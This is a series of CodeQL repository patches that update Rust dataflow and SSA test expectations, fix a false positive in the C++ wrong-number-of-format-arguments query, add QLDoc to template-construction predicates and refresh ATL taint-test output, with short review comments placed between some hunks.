main.rs:352:10:352:16 | mut_arr | array[] | main.rs:352:10:352:19 | mut_arr[1] | +| main.rs:354:5:354:11 | mut_arr | array[] | main.rs:354:5:354:14 | mut_arr[1] | +| main.rs:355:13:355:19 | mut_arr | array[] | main.rs:355:13:355:22 | mut_arr[1] | +| main.rs:357:10:357:16 | mut_arr | array[] | main.rs:357:10:357:19 | mut_arr[0] | diff --git a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected index ed51d66a1ad..9051630f5c4 100644 --- a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected 
@@ -64,6 +64,32 @@ edges | main.rs:298:22:298:22 | n | main.rs:298:34:298:34 | n | provenance | | | main.rs:302:9:302:24 | C {...} [C] | main.rs:302:22:302:22 | n | provenance | | | main.rs:302:22:302:22 | n | main.rs:302:53:302:53 | n | provenance | | +| main.rs:314:16:314:33 | [...] [array[]] | main.rs:315:14:315:17 | arr1 [array[]] | provenance | | +| main.rs:314:23:314:32 | source(...) | main.rs:314:16:314:33 | [...] [array[]] | provenance | | +| main.rs:315:14:315:17 | arr1 [array[]] | main.rs:315:14:315:20 | arr1[2] | provenance | | +| main.rs:315:14:315:20 | arr1[2] | main.rs:316:10:316:11 | n1 | provenance | | +| main.rs:318:16:318:31 | [...] [array[]] | main.rs:319:14:319:17 | arr2 [array[]] | provenance | | +| main.rs:318:17:318:26 | source(...) | main.rs:318:16:318:31 | [...] [array[]] | provenance | | +| main.rs:319:14:319:17 | arr2 [array[]] | main.rs:319:14:319:20 | arr2[4] | provenance | | +| main.rs:319:14:319:20 | arr2[4] | main.rs:320:10:320:11 | n2 | provenance | | +| main.rs:328:16:328:33 | [...] [array[]] | main.rs:329:15:329:18 | arr1 [array[]] | provenance | | +| main.rs:328:23:328:32 | source(...) | main.rs:328:16:328:33 | [...] [array[]] | provenance | | +| main.rs:329:9:329:10 | n1 | main.rs:330:14:330:15 | n1 | provenance | | +| main.rs:329:15:329:18 | arr1 [array[]] | main.rs:329:9:329:10 | n1 | provenance | | +| main.rs:340:16:340:33 | [...] [array[]] | main.rs:342:9:342:17 | SlicePat [array[]] | provenance | | +| main.rs:340:23:340:32 | source(...) | main.rs:340:16:340:33 | [...] 
[array[]] | provenance | | +| main.rs:342:9:342:17 | SlicePat [array[]] | main.rs:342:10:342:10 | a | provenance | | +| main.rs:342:9:342:17 | SlicePat [array[]] | main.rs:342:13:342:13 | b | provenance | | +| main.rs:342:9:342:17 | SlicePat [array[]] | main.rs:342:16:342:16 | c | provenance | | +| main.rs:342:10:342:10 | a | main.rs:343:18:343:18 | a | provenance | | +| main.rs:342:13:342:13 | b | main.rs:344:18:344:18 | b | provenance | | +| main.rs:342:16:342:16 | c | main.rs:345:18:345:18 | c | provenance | | +| main.rs:354:5:354:11 | [post] mut_arr [array[]] | main.rs:355:13:355:19 | mut_arr [array[]] | provenance | | +| main.rs:354:5:354:11 | [post] mut_arr [array[]] | main.rs:357:10:357:16 | mut_arr [array[]] | provenance | | +| main.rs:354:18:354:27 | source(...) | main.rs:354:5:354:11 | [post] mut_arr [array[]] | provenance | | +| main.rs:355:13:355:19 | mut_arr [array[]] | main.rs:355:13:355:22 | mut_arr[1] | provenance | | +| main.rs:355:13:355:22 | mut_arr[1] | main.rs:356:10:356:10 | d | provenance | | +| main.rs:357:10:357:16 | mut_arr [array[]] | main.rs:357:10:357:19 | mut_arr[0] | provenance | | nodes | main.rs:15:10:15:18 | source(...) | semmle.label | source(...) | | main.rs:19:13:19:21 | source(...) | semmle.label | source(...) | 
@@ -147,6 +173,37 @@ nodes | main.rs:302:9:302:24 | C {...} [C] | semmle.label | C {...} [C] | | main.rs:302:22:302:22 | n | semmle.label | n | | main.rs:302:53:302:53 | n | semmle.label | n | +| main.rs:314:16:314:33 | [...] [array[]] | semmle.label | [...] [array[]] | +| main.rs:314:23:314:32 | source(...) | semmle.label | source(...) | +| main.rs:315:14:315:17 | arr1 [array[]] | semmle.label | arr1 [array[]] | +| main.rs:315:14:315:20 | arr1[2] | semmle.label | arr1[2] | +| main.rs:316:10:316:11 | n1 | semmle.label | n1 | +| main.rs:318:16:318:31 | [...] [array[]] | semmle.label | [...] [array[]] | +| main.rs:318:17:318:26 | source(...) | semmle.label | source(...) | +| main.rs:319:14:319:17 | arr2 [array[]] | semmle.label | arr2 [array[]] | +| main.rs:319:14:319:20 | arr2[4] | semmle.label | arr2[4] | +| main.rs:320:10:320:11 | n2 | semmle.label | n2 | +| main.rs:328:16:328:33 | [...] [array[]] | semmle.label | [...] [array[]] | +| main.rs:328:23:328:32 | source(...) | semmle.label | source(...) | +| main.rs:329:9:329:10 | n1 | semmle.label | n1 | +| main.rs:329:15:329:18 | arr1 [array[]] | semmle.label | arr1 [array[]] | +| main.rs:330:14:330:15 | n1 | semmle.label | n1 | +| main.rs:340:16:340:33 | [...] [array[]] | semmle.label | [...] [array[]] | +| main.rs:340:23:340:32 | source(...) | semmle.label | source(...) | +| main.rs:342:9:342:17 | SlicePat [array[]] | semmle.label | SlicePat [array[]] | +| main.rs:342:10:342:10 | a | semmle.label | a | +| main.rs:342:13:342:13 | b | semmle.label | b | +| main.rs:342:16:342:16 | c | semmle.label | c | +| main.rs:343:18:343:18 | a | semmle.label | a | +| main.rs:344:18:344:18 | b | semmle.label | b | +| main.rs:345:18:345:18 | c | semmle.label | c | +| main.rs:354:5:354:11 | [post] mut_arr [array[]] | semmle.label | [post] mut_arr [array[]] | +| main.rs:354:18:354:27 | source(...) | semmle.label | source(...) 
| +| main.rs:355:13:355:19 | mut_arr [array[]] | semmle.label | mut_arr [array[]] | +| main.rs:355:13:355:22 | mut_arr[1] | semmle.label | mut_arr[1] | +| main.rs:356:10:356:10 | d | semmle.label | d | +| main.rs:357:10:357:16 | mut_arr [array[]] | semmle.label | mut_arr [array[]] | +| main.rs:357:10:357:19 | mut_arr[0] | semmle.label | mut_arr[0] | subpaths testFailures #select 
@@ -172,3 +229,11 @@ testFailures | main.rs:282:81:282:81 | n | main.rs:274:18:274:27 | source(...) | main.rs:282:81:282:81 | n | $@ | main.rs:274:18:274:27 | source(...) | source(...) | | main.rs:298:34:298:34 | n | main.rs:294:18:294:27 | source(...) | main.rs:298:34:298:34 | n | $@ | main.rs:294:18:294:27 | source(...) | source(...) | | main.rs:302:53:302:53 | n | main.rs:294:18:294:27 | source(...) | main.rs:302:53:302:53 | n | $@ | main.rs:294:18:294:27 | source(...) | source(...) | +| main.rs:316:10:316:11 | n1 | main.rs:314:23:314:32 | source(...) | main.rs:316:10:316:11 | n1 | $@ | main.rs:314:23:314:32 | source(...) | source(...) | +| main.rs:320:10:320:11 | n2 | main.rs:318:17:318:26 | source(...) | main.rs:320:10:320:11 | n2 | $@ | main.rs:318:17:318:26 | source(...) | source(...) | +| main.rs:330:14:330:15 | n1 | main.rs:328:23:328:32 | source(...) | main.rs:330:14:330:15 | n1 | $@ | main.rs:328:23:328:32 | source(...) | source(...) | +| main.rs:343:18:343:18 | a | main.rs:340:23:340:32 | source(...) | main.rs:343:18:343:18 | a | $@ | main.rs:340:23:340:32 | source(...) | source(...) | +| main.rs:344:18:344:18 | b | main.rs:340:23:340:32 | source(...) | main.rs:344:18:344:18 | b | $@ | main.rs:340:23:340:32 | source(...) | source(...) | +| main.rs:345:18:345:18 | c | main.rs:340:23:340:32 | source(...) | main.rs:345:18:345:18 | c | $@ | main.rs:340:23:340:32 | source(...) | source(...) | +| main.rs:356:10:356:10 | d | main.rs:354:18:354:27 | source(...) | main.rs:356:10:356:10 | d | $@ | main.rs:354:18:354:27 | source(...) | source(...) | +| main.rs:357:10:357:19 | mut_arr[0] | main.rs:354:18:354:27 | source(...) | main.rs:357:10:357:19 | mut_arr[0] | $@ | main.rs:354:18:354:27 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/local/main.rs b/rust/ql/test/library-tests/dataflow/local/main.rs index 05e0997e6ea..29d849eed54 100644 --- a/rust/ql/test/library-tests/dataflow/local/main.rs 
+++ b/rust/ql/test/library-tests/dataflow/local/main.rs @@ -313,11 +313,11 @@ fn custom_record_enum_pattern_match_unqualified() { fn array_lookup() { let arr1 = [1, 2, source(94)]; let n1 = arr1[2]; - sink(n1); // $ MISSING: hasValueFlow=94 + sink(n1); // $ hasValueFlow=94 let arr2 = [source(20); 10]; let n2 = arr2[4]; - sink(n2); // $ MISSING: hasValueFlow=20 + sink(n2); // $ hasValueFlow=20 let arr3 = [1, 2, 3]; let n3 = arr3[2]; @@ -327,7 +327,7 @@ fn array_lookup() { fn array_for_loop() { let arr1 = [1, 2, source(43)]; for n1 in arr1 { - sink(n1); // $ MISSING: hasValueFlow=43 + sink(n1); // $ hasValueFlow=43 } let arr2 = [1, 2, 3]; @@ -340,9 +340,9 @@ fn array_slice_pattern() { let arr1 = [1, 2, source(43)]; match arr1 { [a, b, c] => { - sink(a); - sink(b); - sink(c); // $ MISSING: hasValueFlow=43 + sink(a); // $ SPURIOUS: hasValueFlow=43 + sink(b); // $ SPURIOUS: hasValueFlow=43 + sink(c); // $ hasValueFlow=43 } } } @@ -353,8 +353,8 @@ fn array_assignment() { mut_arr[1] = source(55); let d = mut_arr[1]; - sink(d); // $ MISSING: hasValueFlow=55 - sink(mut_arr[0]); + sink(d); // $ hasValueFlow=55 + sink(mut_arr[0]); // $ SPURIOUS: hasValueFlow=55 } fn main() { diff --git a/rust/ql/test/library-tests/variables/Ssa.expected b/rust/ql/test/library-tests/variables/Ssa.expected index 2898dac871e..18fc0cffc35 100644 --- a/rust/ql/test/library-tests/variables/Ssa.expected +++ b/rust/ql/test/library-tests/variables/Ssa.expected @@ -137,7 +137,6 @@ definition | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | | variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | -| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | | variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | | variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | | variables.rs:514:9:514:9 | z | variables.rs:514:9:514:9 | z | 
@@ -266,7 +265,8 @@ read | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | variables.rs:483:16:483:19 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | | variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:502:15:502:15 | a | -| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | variables.rs:504:15:504:15 | a | +| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:503:5:503:5 | a | +| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:504:15:504:15 | a | | variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | variables.rs:506:15:506:15 | a | | variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | variables.rs:512:15:512:15 | x | | variables.rs:523:10:523:18 | SelfParam | variables.rs:523:15:523:18 | self | variables.rs:524:6:524:9 | self | @@ -371,7 +371,6 @@ firstRead | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | variables.rs:483:16:483:19 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | | variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:502:15:502:15 | a | -| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | variables.rs:504:15:504:15 | a | | variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | variables.rs:506:15:506:15 | a | | variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | variables.rs:512:15:512:15 | x | | variables.rs:523:10:523:18 | SelfParam | variables.rs:523:15:523:18 | self | variables.rs:524:6:524:9 | self | 
@@ -476,8 +475,7 @@ lastRead | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:472:19:472:19 | x | | variables.rs:482:15:482:23 | SelfParam | variables.rs:482:20:482:23 | self | variables.rs:483:16:483:19 | self | | variables.rs:486:11:486:14 | SelfParam | variables.rs:486:11:486:14 | self | variables.rs:487:9:487:12 | self | -| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:502:15:502:15 | a | -| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | variables.rs:504:15:504:15 | a | +| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:504:15:504:15 | a | | variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | variables.rs:506:15:506:15 | a | | variables.rs:510:9:510:9 | x | variables.rs:510:9:510:9 | x | variables.rs:512:15:512:15 | x | | variables.rs:523:10:523:18 | SelfParam | variables.rs:523:15:523:18 | self | variables.rs:524:6:524:9 | self | @@ -508,6 +506,8 @@ adjacentReads | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:464:19:464:19 | x | variables.rs:472:19:472:19 | x | | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:466:19:466:19 | x | variables.rs:470:19:470:19 | x | | variables.rs:462:9:462:9 | x | variables.rs:462:9:462:9 | x | variables.rs:466:19:466:19 | x | variables.rs:472:19:472:19 | x | +| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:502:15:502:15 | a | variables.rs:503:5:503:5 | a | +| variables.rs:501:9:501:13 | a | variables.rs:501:13:501:13 | a | variables.rs:503:5:503:5 | a | variables.rs:504:15:504:15 | a | phi | variables.rs:191:9:191:44 | [match(true)] phi | variables.rs:191:9:191:44 | a3 | variables.rs:191:22:191:23 | a3 | | variables.rs:191:9:191:44 | [match(true)] phi | variables.rs:191:9:191:44 | a3 | variables.rs:191:42:191:43 | a3 | 
diff --git a/rust/ql/test/library-tests/variables/variables.expected b/rust/ql/test/library-tests/variables/variables.expected index 7d83ec1fbc5..141114e2700 100644 --- a/rust/ql/test/library-tests/variables/variables.expected +++ b/rust/ql/test/library-tests/variables/variables.expected @@ -1,6 +1,4 @@ testFailures -| variables.rs:503:5:503:5 | a | Unexpected result: write_access=a | -| variables.rs:503:15:503:32 | //... | Missing result: read_access=a | failures variable | variables.rs:3:14:3:14 | s | @@ -281,7 +279,6 @@ variableWriteAccess | variables.rs:450:9:450:9 | x | variables.rs:446:13:446:13 | x | | variables.rs:454:9:454:9 | x | variables.rs:446:13:446:13 | x | | variables.rs:496:5:496:5 | a | variables.rs:492:13:492:13 | a | -| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | | variables.rs:505:5:505:5 | a | variables.rs:501:13:501:13 | a | variableReadAccess | variables.rs:4:20:4:20 | s | variables.rs:3:14:3:14 | s | @@ -419,6 +416,7 @@ variableReadAccess | variables.rs:495:15:495:15 | a | variables.rs:492:13:492:13 | a | | variables.rs:497:15:497:15 | a | variables.rs:492:13:492:13 | a | | variables.rs:502:15:502:15 | a | variables.rs:501:13:501:13 | a | +| variables.rs:503:5:503:5 | a | variables.rs:501:13:501:13 | a | | variables.rs:504:15:504:15 | a | variables.rs:501:13:501:13 | a | | variables.rs:506:15:506:15 | a | variables.rs:501:13:501:13 | a | | variables.rs:512:15:512:15 | x | variables.rs:510:9:510:9 | x | From 08859be07bfcf2e297b7baeee5ca216c097e79e2 Mon Sep 17 00:00:00 2001 From: Calum Grant Date: Tue, 3 Dec 2024 16:33:40 +0000 Subject: [PATCH 0779/1267] C++: Test case for cpp/wrong-number-format-arguments --- .../WrongNumberOfFormatArguments.expected | 1 + .../Format/WrongNumberOfFormatArguments/syntax_errors.c | 6 +++++- 2 files changed, 6 insertions(+), 1 deletion(-) 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected index d99190ef1eb..c4a9e8d3c6c 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected @@ -5,6 +5,7 @@ | macros.cpp:14:2:14:37 | call to printf | Format for printf (in a macro expansion) expects 4 arguments but given 3 | | macros.cpp:21:2:21:36 | call to printf | Format for printf (in a macro expansion) expects 4 arguments but given 3 | | macros.cpp:32:2:32:25 | call to printf | Format for printf (in a macro expansion) expects 1 arguments but given 0 | +| syntax_errors.c:8:5:8:10 | call to printf | Format for printf expects 2 arguments but given 1 | | test.c:9:2:9:7 | call to printf | Format for printf expects 1 arguments but given 0 | | test.c:12:2:12:7 | call to printf | Format for printf expects 2 arguments but given 1 | | test.c:15:2:15:7 | call to printf | Format for printf expects 3 arguments but given 2 | diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c index 8dfa8b9418c..c9f7ab4dc4b 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/syntax_errors.c @@ -3,5 +3,9 @@ extern int printf(const char *fmt, ...); void test_syntax_error() { - printf("Error code %d: " FMT_MSG, 0, ""); + printf("Error code %d: " UNDEFINED_MACRO, 0, ""); + + printf("%d%d", + (UNDEFINED_MACRO)1, + (UNDEFINED_MACRO)2); } From 99efff22174ae3614f44dc12612daf71a448d042 Mon Sep 17 00:00:00 2001 
From: Calum Grant Date: Tue, 3 Dec 2024 16:40:02 +0000 Subject: [PATCH 0780/1267] C++: Fix a FP in cpp/wrong-number-format-arguments caused by extraction error --- cpp/ql/src/Likely Bugs/Format/WrongNumberOfFormatArguments.ql | 3 ++- .../WrongNumberOfFormatArguments.expected | 1 - 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cpp/ql/src/Likely Bugs/Format/WrongNumberOfFormatArguments.ql b/cpp/ql/src/Likely Bugs/Format/WrongNumberOfFormatArguments.ql index 1dd1668a880..38ca69361cd 100644 --- a/cpp/ql/src/Likely Bugs/Format/WrongNumberOfFormatArguments.ql +++ b/cpp/ql/src/Likely Bugs/Format/WrongNumberOfFormatArguments.ql @@ -44,7 +44,8 @@ where ) and // A typical problem is that string literals are concatenated, but if one of the string // literals is an undefined macro, then this just leads to a syntax error. - not exists(SyntaxError e | e.affects(fl)) + not exists(SyntaxError e | e.affects(fl)) and + not ffc.getArgument(_) instanceof ErrorExpr select ffc, "Format for " + ffcName + " expects " + expected.toString() + " arguments but given " + given.toString() diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected index c4a9e8d3c6c..d99190ef1eb 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongNumberOfFormatArguments/WrongNumberOfFormatArguments.expected 
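Review bot: The added condition `not ffc.getArgument(_) instanceof ErrorExpr` in the `where` clause of WrongNumberOfFormatArguments.ql has no comment of its own, and the comment above it still describes only the undefined-macro string-literal case covered by the `SyntaxError` check. As written, the condition drops the alert for the whole call whenever any one argument is an `ErrorExpr`, so a genuine argument-count mismatch in a partially extracted call would presumably go unreported as well. If that precision-over-recall trade-off is intended, it is worth stating. I would add `// Also skip calls where an argument failed to extract (ErrorExpr); the argument count is unreliable there.` directly above the new line. The `where` clause begins outside this hunk.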
@@ -5,7 +5,6 @@ | macros.cpp:14:2:14:37 | call to printf | Format for printf (in a macro expansion) expects 4 arguments but given 3 | | macros.cpp:21:2:21:36 | call to printf | Format for printf (in a macro expansion) expects 4 arguments but given 3 | | macros.cpp:32:2:32:25 | call to printf | Format for printf (in a macro expansion) expects 1 arguments but given 0 | -| syntax_errors.c:8:5:8:10 | call to printf | Format for printf expects 2 arguments but given 1 | | test.c:9:2:9:7 | call to printf | Format for printf expects 1 arguments but given 0 | | test.c:12:2:12:7 | call to printf | Format for printf expects 2 arguments but given 1 | | test.c:15:2:15:7 | call to printf | Format for printf expects 3 arguments but given 2 | From 2c58279137a2f3da9b3c71e18d7966e2b9c60ad2 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 3 Dec 2024 17:52:29 +0000 Subject: [PATCH 0781/1267] C++: Add QLDoc to 'isClassConstructedFrom' and 'isFunctionConstructedFrom'. --- .../semmle/code/cpp/dataflow/ExternalFlow.qll | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll b/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll index 9496bfe98ba..d234dbc8e3a 100644 --- a/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll +++ b/cpp/ql/lib/semmle/code/cpp/dataflow/ExternalFlow.qll 
@@ -434,12 +434,30 @@ private predicate elementSpec( summaryModel(namespace, type, subtypes, name, signature, ext, _, _, _, _, _) } +/** + * Holds if `c` is an instantiation of a class template `templateClass`, or + * holds with `c = templateClass` if `c` is not an instantiation of any class + * template. + * + * This predicate is used instead of `Class.isConstructedFrom` (which only + * holds for template instantiations) in this file to allow for uniform + * treatment of non-templated classes and class template instantiations. + */ private predicate isClassConstructedFrom(Class c, Class templateClass) { c.isConstructedFrom(templateClass) or not c.isConstructedFrom(_) and c = templateClass } +/** + * Holds if `f` is an instantiation of a function template `templateFunc`, or + * holds with `f = templateFunc` if `f` is not an instantiation of any function + * template. + * + * This predicate is used instead of `Function.isConstructedFrom` (which only + * holds for template instantiations) in this file to allow for uniform + * treatment of non-templated classes and class template instantiations. + */ private predicate isFunctionConstructedFrom(Function f, Function templateFunc) { f.isConstructedFrom(templateFunc) or From 0c8245f727e8fc7fac2b5731dcbc5e4d7bd86fdc Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 3 Dec 2024 17:53:01 +0000 Subject: [PATCH 0782/1267] Update cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp Co-authored-by: Geoffrey White <40627776+geoffw0@users.noreply.github.com> --- cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index de3df30b283..d8f5da01633 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp 
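Review bot: The QLDoc added for `isFunctionConstructedFrom` ends with a sentence carried over from the class predicate. It says the predicate allows "uniform treatment of non-templated classes and class template instantiations", but the predicate relates `Function` values and refers to `Function.isConstructedFrom`. The last line of that comment should read `* treatment of non-templated functions and function template instantiations.` The body of `isFunctionConstructedFrom` continues past the end of this hunk.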
@@ -25,7 +25,8 @@ typedef wchar_t* LPWSTR, *PWSTR; typedef BSTR* LPBSTR; typedef unsigned short USHORT; typedef char *LPTSTR; -struct __POSITION { int unused; };typedef __POSITION* POSITION; +struct __POSITION { int unused; }; +typedef __POSITION* POSITION; typedef WORD ATL_URL_PORT; enum ATL_URL_SCHEME{ From 593e2233f827f63161c664be9c54ec556c59ddde Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Tue, 3 Dec 2024 17:55:59 +0000 Subject: [PATCH 0783/1267] C++: Update test changes after 0c8245f727e8fc7fac2b5731dcbc5e4d7bd86fdc. --- .../dataflow/taint-tests/localTaint.expected | 1608 ++++++++--------- .../taint-tests/test_mad-signatures.expected | 400 ++-- 2 files changed, 1004 insertions(+), 1004 deletions(-) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index 3f77cb77b9c..c8a2ee98665 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected 
@@ -140,820 +140,820 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | arrayassignment.cpp:145:12:145:12 | 5 | arrayassignment.cpp:145:7:145:13 | access to array | TAINT | | arrayassignment.cpp:146:7:146:10 | arr3 | arrayassignment.cpp:146:7:146:13 | access to array | | | arrayassignment.cpp:146:12:146:12 | 5 | arrayassignment.cpp:146:7:146:13 | access to array | TAINT | -| atl.cpp:32:30:32:30 | 1 | atl.cpp:32:29:32:30 | - ... | TAINT | -| atl.cpp:76:14:76:25 | call to source | atl.cpp:77:21:77:21 | x | | -| atl.cpp:77:21:77:21 | x | atl.cpp:77:21:77:22 | call to _U_STRINGorID | TAINT | -| atl.cpp:77:21:77:22 | call to _U_STRINGorID | atl.cpp:78:10:78:10 | u | | -| atl.cpp:82:17:82:43 | call to indirect_source | atl.cpp:83:21:83:21 | y | | -| atl.cpp:83:21:83:21 | y | atl.cpp:83:21:83:22 | call to _U_STRINGorID | TAINT | -| atl.cpp:83:21:83:22 | call to _U_STRINGorID | atl.cpp:84:10:84:10 | u | | -| atl.cpp:103:15:103:35 | call to indirect_source | atl.cpp:104:19:104:19 | x | | -| atl.cpp:104:19:104:19 | x | atl.cpp:104:19:104:20 | call to CA2AEX | TAINT | -| atl.cpp:104:19:104:20 | call to CA2AEX | atl.cpp:105:29:105:29 | a | | -| atl.cpp:104:19:104:20 | call to CA2AEX | atl.cpp:106:10:106:10 | a | | -| atl.cpp:104:19:104:20 | call to CA2AEX | atl.cpp:107:10:107:10 | a | | -| atl.cpp:104:19:104:20 | call to CA2AEX | atl.cpp:108:3:108:3 | a | | -| atl.cpp:105:29:105:29 | ref arg a | atl.cpp:106:10:106:10 | a | | -| atl.cpp:105:29:105:29 | ref arg a | atl.cpp:107:10:107:10 | a | | -| atl.cpp:105:29:105:29 | ref arg a | atl.cpp:108:3:108:3 | a | | -| atl.cpp:106:10:106:10 | a [post update] | atl.cpp:107:10:107:10 | a | | -| atl.cpp:106:10:106:10 | a [post update] | atl.cpp:108:3:108:3 | a | | -| atl.cpp:107:10:107:10 | a [post update] | atl.cpp:108:3:108:3 | a | | -| atl.cpp:111:15:111:35 | call to indirect_source | atl.cpp:112:19:112:19 | x | | -| atl.cpp:112:19:112:23 | call to CA2AEX | atl.cpp:113:29:113:29 | a | | -| 
atl.cpp:112:19:112:23 | call to CA2AEX | atl.cpp:114:10:114:10 | a | | -| atl.cpp:112:19:112:23 | call to CA2AEX | atl.cpp:115:10:115:10 | a | | -| atl.cpp:112:19:112:23 | call to CA2AEX | atl.cpp:116:3:116:3 | a | | -| atl.cpp:113:29:113:29 | ref arg a | atl.cpp:114:10:114:10 | a | | -| atl.cpp:113:29:113:29 | ref arg a | atl.cpp:115:10:115:10 | a | | -| atl.cpp:113:29:113:29 | ref arg a | atl.cpp:116:3:116:3 | a | | -| atl.cpp:114:10:114:10 | a [post update] | atl.cpp:115:10:115:10 | a | | -| atl.cpp:114:10:114:10 | a [post update] | atl.cpp:116:3:116:3 | a | | -| atl.cpp:115:10:115:10 | a [post update] | atl.cpp:116:3:116:3 | a | | -| atl.cpp:129:14:129:34 | call to indirect_source | atl.cpp:131:20:131:20 | x | | -| atl.cpp:129:14:129:34 | call to indirect_source | atl.cpp:137:20:137:20 | x | | -| atl.cpp:131:20:131:20 | x | atl.cpp:131:20:131:21 | call to CA2CAEX | TAINT | -| atl.cpp:131:20:131:21 | call to CA2CAEX | atl.cpp:132:30:132:30 | a | | -| atl.cpp:131:20:131:21 | call to CA2CAEX | atl.cpp:133:10:133:10 | a | | -| atl.cpp:131:20:131:21 | call to CA2CAEX | atl.cpp:134:10:134:10 | a | | -| atl.cpp:131:20:131:21 | call to CA2CAEX | atl.cpp:135:3:135:3 | a | | -| atl.cpp:137:20:137:24 | call to CA2CAEX | atl.cpp:138:30:138:30 | a | | -| atl.cpp:137:20:137:24 | call to CA2CAEX | atl.cpp:139:10:139:10 | a | | -| atl.cpp:137:20:137:24 | call to CA2CAEX | atl.cpp:140:10:140:10 | a | | -| atl.cpp:137:20:137:24 | call to CA2CAEX | atl.cpp:141:3:141:3 | a | | -| atl.cpp:155:14:155:34 | call to indirect_source | atl.cpp:157:19:157:19 | x | | -| atl.cpp:155:14:155:34 | call to indirect_source | atl.cpp:163:19:163:19 | x | | -| atl.cpp:157:19:157:19 | x | atl.cpp:157:19:157:20 | call to CA2WEX | TAINT | -| atl.cpp:157:19:157:20 | call to CA2WEX | atl.cpp:158:30:158:30 | a | | -| atl.cpp:157:19:157:20 | call to CA2WEX | atl.cpp:159:10:159:10 | a | | -| atl.cpp:157:19:157:20 | call to CA2WEX | atl.cpp:160:10:160:10 | a | | -| atl.cpp:157:19:157:20 | call to CA2WEX | 
